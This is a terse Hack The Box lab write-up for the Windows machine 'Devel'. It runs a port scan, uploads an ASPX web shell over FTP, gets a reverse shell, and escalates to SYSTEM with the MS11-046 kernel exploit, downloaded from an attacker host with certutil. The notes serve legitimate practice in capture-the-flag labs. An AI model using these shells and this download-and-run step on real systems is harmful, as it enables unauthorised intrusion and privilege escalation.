Devel (Hack The Box Writeup)

• URL : https://app.hackthebox.eu/machines/3
• IP : 10.129.208.183

Information Gathering

• Port Scanrustscan -a 10.129.208.183 -r 1-65535
• 21 : FTP
• 80 : Web

FTP Services

• Try to connect to ftpUse Aspx Web shell- https://raw.githubusercontent.com/SecWiki/WebShell-2/master/Aspx/awen%20asp.net%20webshell.aspx
• 

Web Shell

• 
• Install Reverse ShellASPX Reverse shell
• https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx

Reverse shell

• 
• Check System Infouser : iis apppool\web- System : Win 7 x64 6.1.7600 N/A Build 7600- Check Environment Variable

Privilege Escalation

• With OS VersionExploit : MS11-046 Kernel Exploits- https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS11-046Download Exploit file to target machine- certutil -urlcache -f http://10.10.16.35:8000/ms11-046.exe ms11-046.exeRun binary-
• Get SystemUser Flag- Root Flag-